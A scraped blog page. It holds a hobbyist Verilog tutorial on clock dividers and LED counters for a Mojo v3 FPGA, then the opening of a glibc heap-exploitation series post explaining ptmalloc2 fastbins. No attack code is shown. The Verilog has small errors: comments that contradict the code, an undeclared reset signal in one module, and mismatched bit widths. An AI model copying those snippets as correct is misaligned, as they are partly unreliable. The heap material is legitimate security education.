You probably want to pick up a book on assignment operations and constraints, and practice them a bit (<i>I've tried to be as verbose as possible</i>). This is because the kind of assignment you use imposes major drama on which types are assignable to which types, i.e. can you assign a reg to a wire? It's basically due to how the tools resolve different types to the board components (and combinations of them) mentioned above - if you give them something that works sequentially where they expect something combinational, or something meant for storage where nothing is stored, it can cause antagonisms that are annoying. <i>So be careful and try out stuff a lot, write some bad Verilog so you know what it looks like lol. </i><br />
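Here's a small sketch (names are my own) of what the tools will and won't accept in plain Verilog-2001. A wire is driven by an assign statement (or a module output), a reg is assigned inside an always block, and either one can be read on the right-hand side of anything. So a wire can happily carry a reg's value, but you can't assign to a wire inside an always block, and you can't use a continuous assign on a reg (SystemVerilog's logic type relaxes some of this):<br />

```verilog
// Illustrative sketch of legal wire/reg usage in plain Verilog-2001.
module wire_reg_demo (
    input  wire clk,
    input  wire d,
    output wire q_inv     // a wire, driven by a continuous assign
);
    reg q = 1'b0;         // a reg, assigned only inside an always block

    always @(posedge clk)
        q <= d;           // OK: procedural assignment to a reg

    assign q_inv = ~q;    // OK: a wire driven from a reg's value

    // Not allowed (each would be a compile error):
    //   always @(posedge clk) q_inv <= d;  // can't procedurally assign a wire
    //   assign q = d;                      // can't continuously assign a reg
endmodule
```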
<br />
Okay, so that's pretty bare-bones Verilog. You will probably be able to write "valid" Verilog using this, but to compute on real things, with real clocks, and achieve actual interaction with real "hardware", you're going to need to learn how to divide the clock!<br />
<br />
<h2 style="text-align: left;">
Clock Divider Circuits and Blinking LEDs</h2>
<br />
I like starting with this because it will be an integral part of a lot of Verilog problems and problem-solving strategies. We will most probably be sampling from a certain module at a given rate or clocking in data at given rates; you might need to run multiple different things at multiple different clock frequencies, or be required to by certain protocols. So you shouldn't think of a clock as a single rhythm to dance your circuit to; instead, see it as something consisting of beats you can skip, group together or chop up any way you need (<i>within physical bounds of course</i>) - <i>multiple loving tweets at different frequencies :) </i><br />
<br />
Here's a simple clock divider circuit in Verilog. It drives the Mojo v3 board's on-board <span style="font-family: "courier new" , "courier" , monospace;">led[7]</span> from bit 20 of a counter that goes up by one on every tick of the board's 50 MHz clock, so the LED flips on and off at 1/2^21 of the board's natural clock frequency (one full on/off cycle every 2^21 ticks):<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">module mojo_top( /*module declaration*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input clk, //clock input @ 50 MHz (according to ucf file)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input rst_n, //reset input </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> output [7:0]led //array of LEDs on the Mojo Board</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> );</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">wire rst = ~rst_n; // make reset active high</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reg [25:0] clk_div; //declare 25 bits worth of D-FlipFlop "storage"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">assign led[6:0] = 6'bz; //set the LEDs from 6 down to 7 to "off"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>assign led[7] = clk_div[20];</b> //assign 20th bit in clk_div to led 0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">always @ (posedge clk) begin //declare always block</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span><b>clk_div <= clk_div + 1;</b> //add one to the 25 bit array</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">endmodule</span><br />
<br />
And the user constraints file looks like this:<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">NET "clk" TNM_NET = clk;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">TIMESPEC TS_clk = PERIOD "clk" 50 MHz HIGH 50%;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"># PlanAhead Generated physical constraints </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "clk" LOC = P56 | IOSTANDARD = LVTTL; //clock signal</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "rst_n" LOC = P38 | IOSTANDARD = LVTTL; //reset button</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<0>" LOC = P134 | IOSTANDARD = LVTTL; //on board led 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<1>" LOC = P133 | IOSTANDARD = LVTTL; //on board led 2</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<2>" LOC = P132 | IOSTANDARD = LVTTL; //and so forth...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<3>" LOC = P131 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<4>" LOC = P127 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<5>" LOC = P126 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<6>" LOC = P124 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<7>" LOC = P123 | IOSTANDARD = LVTTL;</span><br />
<div>
<br /></div>
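To put some numbers on this: bit N of a free-running counter flips once every 2^N clock ticks, so one full on/off cycle takes 2^(N+1) ticks. For clk_div[20] on the 50 MHz Mojo clock that works out to 50,000,000 / 2^21 ≈ 23.8 on/off cycles per second, fast enough that it may look more like a flicker than a blink; tapping clk_div[25] instead gives about 50,000,000 / 2^26 ≈ 0.75 Hz. Here's a parameterized sketch of the same counter (the module and parameter names are my own), which makes it easy to simulate with a tiny counter and check that the tapped bit really flips every 2^TAP ticks:<br />

```verilog
// Parameterized sketch of the clock-divider counter (module/parameter names are illustrative).
module clk_divider #(
    parameter integer WIDTH = 26,   // counter width, as in reg [25:0] clk_div
    parameter integer TAP   = 20    // which counter bit drives the output
) (
    input  wire clk,
    output wire slow                // flips every 2^TAP ticks of clk
);
    reg [WIDTH-1:0] clk_div = {WIDTH{1'b0}};

    always @(posedge clk)
        clk_div <= clk_div + 1'b1;  // free-running counter, wraps around at 2^WIDTH

    assign slow = clk_div[TAP];
endmodule
```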
<div>
Lets run through the code a bit. I need to cover this declaration:<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">reg [25:0] clk_div;</span><br />
<br />
This declares what is called a register (a reg). It doesn't necessarily mean a physical hardware register; it just keeps a value until you give it another one. What's also important to remember is that a reg won't always turn into a flip-flop in the bitstream: depending on how you assign it, it can become a latch or plain combinational logic, or be optimized away entirely. Check out this awesome stack overflow answer:<br />
<br />
<pre style="background-color: #eff0f1; border: 0px; box-sizing: inherit; color: #242729; font-family: Consolas, Menlo, Monaco, "Lucida Console", "Liberation Mono", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", "Courier New", monospace, sans-serif; font-size: 13px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; max-height: 600px; overflow-wrap: normal; overflow: auto; padding: 5px; vertical-align: baseline; width: auto;"><code style="border: 0px; box-sizing: inherit; font-family: Consolas, Menlo, Monaco, "Lucida Console", "Liberation Mono", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", "Courier New", monospace, sans-serif; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; white-space: inherit;">> Contrary to their name, regs don't necessarily correspond to
> physical registers. They represent data storage elements in
> Verilog/SystemVerilog. They retain their value till next value is
> assigned to them (not through assign statement). They can be
> synthesized to FF, latch or combinatorial circuit. (They might not be
> synthesizable !!!)</code></pre>
<br />
- (extract from: <a href="https://stackoverflow.com/questions/33459048/what-is-the-difference-between-reg-and-wire-in-a-verilog-module">https://stackoverflow.com/questions/33459048/what-is-the-difference-between-reg-and-wire-in-a-verilog-module</a> )<br />
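To see the "latch" case from that answer in action, here's a sketch (names are my own) of a reg that ends up as a latch rather than a flip-flop: it's assigned in an always @(*) block, but only when en is high, so when en is low it has to hold on to its old value. Synthesis tools will typically warn you about an inferred latch here, and in practice it's usually a bug (a missing else) rather than something you actually wanted:<br />

```verilog
// Illustrative: a reg that infers a latch, not a flip-flop.
module latch_demo (
    input  wire en,
    input  wire d,
    output reg  q
);
    always @(*) begin
        if (en)
            q = d;   // no else branch: q keeps its old value while en is low
    end
endmodule
```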
<br />
Besides the other declarations and the (already covered) always block, we see input/output declarations for:<br />
<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>input</b> clk</span> - the input clock signal (<i>pay attention to the User Constraints File to see how this is declared</i>). In our example it simply a slowed down version of the clock on the board.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>input</b> rst_n</span> - we don't actually use this just yet, its the input from the reset button on the Mojov3 Board; this is a great little "toggle" to have around. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>output</b> [7:0] led</span> - this is an array of reg's declared as output. I know they are reg's (registers) because of how they are elaborated in the User Constraints file namely: <span style="font-family: "courier new" , "courier" , monospace;">NET "rst_n" LOC = P38 | IOSTANDARD</span> meaning essentially <i>location P38 on the board should be a NET called rst_n</i>; </li>
</ul>
<div>
A net is essentially the type that lets you drive signals to and from the I/O blocks; check out this other awesome Stack Overflow answer:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
"The net data types can represent physical connections between structural entities, such as gates. A net shall not store a value (except for the trireg net). Instead, its value shall be determined by the values of its drivers, such as a continuous assignment or a gate."</blockquote>
<div>
<br /></div>
<div>
- <a href="https://stackoverflow.com/questions/9975415/what-does-net-stand-for-in-verilog">https://stackoverflow.com/questions/9975415/what-does-net-stand-for-in-verilog</a></div>
<div>
<br /></div>
<br />
The other interesting pieces of code here are the reg declarations I added (<i>not outputs or inputs, just internal registers we need to count up the clock flips</i>), along with these assignments:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">assign led[6:0] = 6'bz; </span><br />
<br />
This assigns 0 to the 6 bit positions from 7th (number 6) down to 0th which leaves 1 open, namely the 8th bit is set as:<br />
<br />
<b style="font-family: "Courier New", Courier, monospace;">assign led[7] = clk_div[20]; </b><br />
<br />
This assignment ties the 8th LED, <span style="font-family: "courier new" , "courier" , monospace;">led[7]</span>, to bit 20 of the <span style="font-family: "courier new" , "courier" , monospace;">clk_div</span> register. So I declared 25 bits, and I'm taking bit 20 and making <span style="font-family: "courier new" , "courier" , monospace;">led[7]</span> always follow it. The final piece of the puzzle is in the always block:<br />
<br />
<b style="font-family: "Courier New", Courier, monospace;">clk_div <= clk_div + 1;</b><br />
<br />
This adds 1 to the 25-bit value of <span style="font-family: "courier new" , "courier" , monospace;">clk_div</span> on every rising clock edge. <i>As far as I understand this</i>, it means that <span style="font-family: "courier new" , "courier" , monospace;">clk_div</span> keeps counting up, and whenever the number it's at has a "1" in bit 20, <span style="font-family: "courier new" , "courier" , monospace;">led[7]</span> will be on.<br />
<br />
If you think about how binary numbers add up, you can see that the carry slowly bubbles up through the 25 bit places, so bit 20 only flips once every 2<sup>20</sup> clock cycles. This is much slower than the raw clock, which flips up and down 50 million times a second (50 MHz); <i>at that rate your eyes won't even see the LED change, it's so fast</i>. So we basically tell the clock to add up its flips in a total, and when the total is high enough the LED turns on! I hope that makes it easier to understand! What this means is that we can control how fast the LED appears to pulse just by picking a different bit: we can make it pulse faster or slower, and we can even make multiple LEDs on the board pulse at different rates if you want to give yourself a tension headache lol, but it's fun!<br />
<br />
<h2 style="text-align: left;">
8-bit LED Counter and Split Counter</h2>
<br />
It can be a bit hard to find examples of this, but if you understand how the <span style="font-family: "courier new" , "courier" , monospace;">clk_div</span> trick works, then you essentially know how to build a counter already. All you need to do is make a counter for the LEDs. There's one caveat, and that is again the issue of the LEDs changing too fast to see. To solve this we divide the clock again and only add 1 to the counter when the low 21 bits, <span style="font-family: "courier new" , "courier" , monospace;">clk_div[20:0]</span>, roll over to 0, which happens once every 2<sup>21</sup> clock cycles. If we then map the counter to the LEDs, job's done!<br />
<br />
Here's the Verilog:<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">module mojo_top( /*module declaration*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input clk, //clock input @ 50 MHz (according to ucf file)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input rst_n, //reset input </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> output [7:0]led //array of LEDs on the Mojo Board</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> );</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">reg [25:0] clk_div;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reg [7:0] led_dff;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">assign led[7:0] = led_dff[7:0];</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">always @ (posedge clk) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>clk_div <= clk_div + 1;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>if (clk_div[20:0] == 0) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>led_dff <= led_dff + 1;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>if (rst) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>led_dff <= 0;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">endmodule</span><br />
<br />
You can also split the counter into two smaller counters, show each one on its own pair of LEDs, and show their sum on the higher LEDs, like so:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">module mojo_top( /*module declaration*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input clk, //clock input @ 50 MHz (according to ucf file)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input rst_n, //reset input </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> output [7:0]led //array of LEDs on the Mojo Board</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> );</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">wire rst = ~rst_n;</span><br />
<span style="font-family: Courier New, Courier, monospace;">reg [50:0] clk_div;</span><br />
<span style="font-family: Courier New, Courier, monospace;">reg [2:0] dff_1; //d-flip flop for led's</span><br />
<span style="font-family: Courier New, Courier, monospace;">reg [2:0] dff_2;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">assign led[1:0] = dff_1[2:0]; //assign first two bits</span><br />
<span style="font-family: Courier New, Courier, monospace;">assign led[3:2] = dff_2[2:0]; //assign second two bits </span><br />
<span style="font-family: Courier New, Courier, monospace;">assign led[6:4] = dff_1 + dff_2; //save total</span><br />
<span style="font-family: Courier New, Courier, monospace;">assign led[7] = clk_div[20];</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">always @ (posedge clk) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>clk_div <= clk_div + 1;</span><br />
<span style="white-space: pre;"><span style="font-family: Courier New, Courier, monospace;"> </span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>if (clk_div[24:0] == 0) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_1 <= dff_1 + 1;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>if (clk_div[27:0] == 0) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_2 <= dff_2 + 1;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>if (rst) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_1 <= 0;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_2 <= 0;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: Courier New, Courier, monospace;">end</span><br />
<span style="font-family: Courier New, Courier, monospace;">endmodule</span><br />
<br />
<br />
In this example I also made the two counters tick at different speeds (<i>dff_1 steps once every 2<sup>25</sup> clock cycles and dff_2 once every 2<sup>28</sup></i>); you can of course make them all tick the same way, but that would be kind of lame. Anyway, that's it for this one. Let me know if I got some stuff wrong; I'm going to keep posting about other boards and blinky lights. Stay tuned!</div>
<br />
<h2 style="text-align: left;">
Reading and References</h2>
<ol style="text-align: left;">
<li>Register Transfer Level (Wikipedia) - <a href="https://en.wikipedia.org/wiki/Register-transfer_level">https://en.wikipedia.org/wiki/Register-transfer_level</a> </li>
<li>Field Programmable Gate Array (Wikipedia) - <a href="https://en.wikipedia.org/wiki/Field-programmable_gate_array">https://en.wikipedia.org/wiki/Field-programmable_gate_array</a> </li>
<li>All about FPGAs - <a href="https://www.eetimes.com/document.asp?doc_id=1274496">https://www.eetimes.com/document.asp?doc_id=1274496</a></li>
<li>HyperPhysics : The D Flip Flop - <a href="http://hyperphysics.phy-astr.gsu.edu/hbase/Electronic/Dflipflop.html">http://hyperphysics.phy-astr.gsu.edu/hbase/Electronic/Dflipflop.html</a> </li>
<li>Logic Levels - <a href="https://learn.sparkfun.com/tutorials/logic-levels/all">https://learn.sparkfun.com/tutorials/logic-levels/all</a> </li>
<li>"What is the meaning of Active high and Active low in digital circuits" <a href="https://www.quora.com/What-is-the-meaning-of-active-low-and-active-high-in-digital-circuits-and-logic-design">https://www.quora.com/What-is-the-meaning-of-active-low-and-active-high-in-digital-circuits-and-logic-design</a> </li>
<li>Electronic Tutorials : The Multiplexer <a href="https://www.electronics-tutorials.ws/combination/comb_2.html">https://www.electronics-tutorials.ws/combination/comb_2.html</a> </li>
<li>Mojo V3 (Alchitry) - <a href="https://en.wikipedia.org/wiki/Field-programmable_gate_array">https://en.wikipedia.org/wiki/Field-programmable_gate_array</a> </li>
<li>Mojo V3 (SparkFun) - <a href="https://www.sparkfun.com/products/11953">https://www.sparkfun.com/products/11953</a> </li>
<li>Mojo V3 (Amazon) - <a href="https://www.amazon.com/Mojo-V3-FPGA-Development-Board/dp/B0752XX7G6">https://www.amazon.com/Mojo-V3-FPGA-Development-Board/dp/B0752XX7G6</a> </li>
<li>Verilog (Wikipedia) <a href="https://en.wikipedia.org/wiki/Verilog">https://en.wikipedia.org/wiki/Verilog</a> </li>
<li>IEEE Standard for Verilog Hardware Description Language : Standard 1364 <a href="https://www.eg.bucknell.edu/~csci320/2016-fall/wp-content/uploads/2015/08/verilog-std-1364-2005.pdf">https://www.eg.bucknell.edu/~csci320/2016-fall/wp-content/uploads/2015/08/verilog-std-1364-2005.pdf</a> </li>
<li>Verilog Module Structure (Wikibooks) <a href="https://en.wikibooks.org/wiki/Programmable_Logic/Verilog_Module_Structure">https://en.wikibooks.org/wiki/Programmable_Logic/Verilog_Module_Structure</a> </li>
<li>Verilog Always @ Blocks - <a href="https://class.ece.uw.edu/371/peckol/doc/Always@.pdf">https://class.ece.uw.edu/371/peckol/doc/Always@.pdf</a> </li>
<li>Introduction to Verilog - <a href="http://www.doe.carleton.ca/~jknight/97.478/PetervrlK.pdf">http://www.doe.carleton.ca/~jknight/97.478/PetervrlK.pdf</a> </li>
<li>Best Practices for FPGA Development - <a href="http://www.irtc-hq.com/wp-content/uploads/2015/04/Best-FPGA-Development-Practices-2014-02-20.pdf">http://www.irtc-hq.com/wp-content/uploads/2015/04/Best-FPGA-Development-Practices-2014-02-20.pdf</a> </li>
<li>Frequency Divider Circuit (Tutorials Point) <a href="https://www.youtube.com/watch?v=nL8u0YBhyWg">https://www.youtube.com/watch?v=nL8u0YBhyWg</a> </li>
<li>Modular Monthly: Clock dividers & multipliers (Future Music Magazine) - <a href="https://www.youtube.com/watch?v=ilo52K8Oje8">https://www.youtube.com/watch?v=ilo52K8Oje8</a> </li>
<li>Your first FPGA program (nandland) - <a href="https://www.nandland.com/vhdl/tutorials/tutorial-your-first-vhdl-program-part1.html">https://www.nandland.com/vhdl/tutorials/tutorial-your-first-vhdl-program-part1.html</a> </li>
<li>Xilinx Constraints Guide - <a href="http://www.fdi.ucm.es/profesor/mendias/DAS/docs/cgd.pdf">http://www.fdi.ucm.es/profesor/mendias/DAS/docs/cgd.pdf</a> </li>
<li>Altering the FPGA clock frequency of the Mojo (Smolloy.com) <a href="https://www.smolloy.com/2016/01/altering-the-fpga-clock-frequency-of-the-mojo/">https://www.smolloy.com/2016/01/altering-the-fpga-clock-frequency-of-the-mojo/</a> </li>
<li> Arty FPGA 01: Hello World with Verilog & Vivado - <a href="https://timetoexplore.net/blog/arty-fpga-verilog-01">https://timetoexplore.net/blog/arty-fpga-verilog-01</a></li>
<li><a href="https://www.edaplayground.com/">https://www.edaplayground.com/</a></li>
<li>LEARNING VERILOG FOR FPGAS: THE TOOLS AND BUILDING AN ADDER - <a href="https://hackaday.com/2015/08/19/learning-verilog-on-a-25-fpga-part-i/">https://hackaday.com/2015/08/19/learning-verilog-on-a-25-fpga-part-i/</a> </li>
<li>A Verilog HDL Test Bench Primer - <a href="https://people.ece.cornell.edu/land/courses/ece5760/Verilog/LatticeTestbenchPrimer.pdf">https://people.ece.cornell.edu/land/courses/ece5760/Verilog/LatticeTestbenchPrimer.pdf</a> </li>
<li>Icarus + GTK Wave Guide <a href="http://inf-server.inf.uth.gr/~konstadel/resources/Icarus_Verilog_GTKWave_guide.pdf">http://inf-server.inf.uth.gr/~konstadel/resources/Icarus_Verilog_GTKWave_guide.pdf</a></li>
<li><a href="http://iverilog.wikia.com/wiki/GTKWAVE">http://iverilog.wikia.com/wiki/GTKWAVE</a> </li>
<li>Verilog and Number Literals - <a href="http://web.engr.oregonstate.edu/~traylor/ece474/beamer_lectures/verilog_number_literals.pdf">http://web.engr.oregonstate.edu/~traylor/ece474/beamer_lectures/verilog_number_literals.pdf</a> </li>
<li>What's the deal with Verilog's reg's and wires - <a href="https://blogs.mentor.com/verificationhorizons/blog/2013/05/03/wire-vs-reg/">https://blogs.mentor.com/verificationhorizons/blog/2013/05/03/wire-vs-reg/</a> </li>
</ol>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-88732944819995061982018-12-14T00:06:00.001-08:002018-12-14T00:06:26.218-08:00 Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection<div dir="ltr" style="text-align: left;" trbidi="on">
This post is part of a series; check out the others here:<br />
<br />
<ol style="text-align: left;">
<li>Introduction to ptmalloc2 internals (Part 1) - <a href="https://blog.k3170makan.com/2018/11/glibc-heap-exploitation-basics.html">https://blog.k3170makan.com/2018/11/glibc-heap-exploitation-basics.html</a> </li>
<li>ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection (this post)</li>
</ol>
As I mentioned in the previous post, the heap manager keeps metadata about free chunks so that they can be reallocated. To tighten up my language from the last post, I should also mention that there are different kinds of lists (<i>called bins</i>) for managing free chunks of different sizes, namely:<br />
<br />
<ul style="text-align: left;">
<li><b>Unsorted Bin</b> - This is basically a list that temporarily holds freed chunks (<i>other than fastbin-sized ones</i>) before they get sorted into the Small or Large bins. To quote a paper on ptmalloc about this:</li>
</ul>
<div>
<i>When freeing chunks not in
the range of fastbin, they are inserted into unsorted bin at
first rather than the small bins or large bins - </i><a href="https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf">https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf</a> </div>
<ul style="text-align: left;">
<li><b>Small bins</b> - again, as with many things, this is just another list, or rather a group of lists, each holding free heap chunks of a particular size. The thresholds may vary per architecture, glibc version, or even build. But the basic idea is that they are larger than Fast Bins but smaller than Large Bins. <i>I will dig into these in a fair amount of detail in future posts.</i></li>
<li><b>Large Bins</b> - for chunks bigger than the small bin maximum size; <i>they are pretty elusive to me at the moment, so I'm going to leave these out for a later post as well.</i></li>
<li><b>Fast Bins</b> - the star of the show, for all free chunks in a range of sizes below a certain maximum (<i>more details to follow shortly!</i>) </li>
</ul>
<br />
Fastbin'd chunks are covered here first because they use a simplified version of the base <span style="font-family: "courier new" , "courier" , monospace;">malloc_chunk</span> format used for plain old unsorted or "normal sized" heap chunks, and they offer a couple of cool tricks to try out as well! So no large chunks in this post just yet (<i>sorry about that</i>), but I will give them a look once I get enough data ;) Anyway, on to fastbins!<br />
<br />
<h2 style="text-align: left;">
Fast Bin Format</h2>
<i>The fastbins are just a "chunk" yard of unloved memory</i><br />
<br />
Fastbins are reserved for small memory objects (<i>small structs and strings</i>). The idea is that chunks this small don't benefit enough from the usual bookkeeping to justify its compute overhead, so the allocator just keeps a simple list of free regions that fit the size requested. There isn't just one fastbin either: each arena keeps a separate fastbin list for each small size class. To quote:<br />
<br />
"<i>Fastbin is a special design optimized for performance
and cache locality. It is a single linked list similar to look
aside table of Windows, in which free chunks of same size
are linked in a LIFO way.
Chunk size of different fastbins varies. There are [totally] 10 fastbins in an arena yet the first 7 are used by default,
ranging from 16 to 64 bytes on 32-bit systems or 32 to 128
bytes on 64-bit systems</i>" - <a href="https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf">https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf</a><br />
<br />
<br />
Another caveat is that fastbin'd chunks are not coalesced with their neighbouring chunks when they are freed (<i>they keep their in-use bit set</i>); this is again to save spinning the wheels over such small regions. There's much more about fastbins in the comments in <span style="font-family: "courier new" , "courier" , monospace;">glibc-[version]/malloc/malloc.c</span>, which are fantastic, and I fully suggest giving them a read through. <i>I'd hate to blindly copy them here.</i><br />
<br />
That's pretty much the opening blurb on fastbins; let's get into what they look like and how they work.<br />
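The size threshold for fastbins is defined in<i> <a href="https://fossies.org/linux/glibc/malloc/malloc.c">malloc/malloc.c</a></i>. As it stands in glibc-2.23, <span style="font-family: "courier new" , "courier" , monospace;">MAX_FAST_SIZE</span> is defined as <span style="font-family: "courier new" , "courier" , monospace;">(80 * SIZE_SZ / 4)</span>, which evaluates to 80 bytes on 32-bit builds (<i>where SIZE_SZ is 4</i>) and 160 bytes on 64-bit builds (<i>where SIZE_SZ is 8</i>). That is only the ceiling you can raise the limit to with <span style="font-family: "courier new" , "courier" , monospace;">mallopt(M_MXFAST, value)</span>, though; the default, <span style="font-family: "courier new" , "courier" , monospace;">DEFAULT_MXFAST</span>, is <span style="font-family: "courier new" , "courier" , monospace;">(64 * SIZE_SZ / 4)</span>, which is 64 bytes on 32-bit and 128 bytes on 64-bit builds. So small requests up to roughly that default size will end up getting fast bin'd.<br />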
<br />
To provide a good example of the format; here's a chain of fastbins in memory:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKpFnOnoTAGcQTCNu-k8w6ztlbgqHe5FCFGgZQHYzZmnkz0j5TR-USP-7djb2a_H2NPMMCkmqCiC8HgvZCKwNxPWnZFM6WTylQwpqMC6AGISRFP38H1iSnsPE2Q7fbAGThzn3i8I4S32M/s1600/allocatedVsFastbin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="757" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKpFnOnoTAGcQTCNu-k8w6ztlbgqHe5FCFGgZQHYzZmnkz0j5TR-USP-7djb2a_H2NPMMCkmqCiC8HgvZCKwNxPWnZFM6WTylQwpqMC6AGISRFP38H1iSnsPE2Q7fbAGThzn3i8I4S32M/s1600/allocatedVsFastbin.png" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I've grabbed an example screenshot here that also compares a non-fastbinned chunk, just a plain old chunk <span style="font-family: "courier new" , "courier" , monospace;">0xb0</span> bytes in size <i>(the first one allocated, with a mem pointer at <span style="font-family: "courier new" , "courier" , monospace;">0x602010</span></i>), to show the difference between the formats a little more clearly.<br />
<br />
On the left you see the "live" fastbin'd chunks (<i>starting at the <span style="font-family: "courier new" , "courier" , monospace;">0x6020b0</span></i>) . Nothing really gives them away as fastbins in this state except for their sizes. On the right you will see the free'd fastbin'd chunks; a key thing to notice here is that they have a single back-pointer (<i>forming a linked list of fastbin chunks</i>) indicating where the next free fastbin'd chunk is.<br />
<br />
What you will also notice is that here we definitely have fastbin'd chunks that sit next to each other in memory and are all free'd, yet none of them have been joined together: each one keeps its own size field. As mentioned before, they are not coalesced.<br />
<br />
